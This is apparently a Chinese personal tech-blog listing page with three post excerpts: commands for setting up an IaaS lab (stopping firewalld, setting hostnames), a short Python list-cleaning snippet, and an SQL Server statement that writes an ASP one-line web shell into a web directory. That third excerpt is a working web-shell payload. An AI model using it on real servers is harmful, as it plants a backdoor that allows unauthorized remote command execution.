摘要:
IaaS 平台构建 1.关闭防火墙,禁止开机自启 systemctl stop firewalld systemctl disable firewalld 2.设置主机名 hostnamectl set-hostname controller 设置主机名compute 3.设置selinux,per 阅读全文
posted @ 2021-04-28 21:20
只是条咸鱼罢了
阅读(1012)
评论(0)
推荐(1)
摘要:
test = ['', 'ttt\n ', "123"] test = [x.strip() for x in test if x.strip() != ''] print(test) 阅读全文
posted @ 2021-04-28 21:09
只是条咸鱼罢了
阅读(385)
评论(0)
推荐(0)
摘要:
1、SQLServer执行SQL语句生成一句话 select '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_master; NB_master必须是已经存在的表 阅读全文
posted @ 2021-04-28 17:01
只是条咸鱼罢了
阅读(392)
评论(0)
推荐(0)

浙公网安备 33010602011771号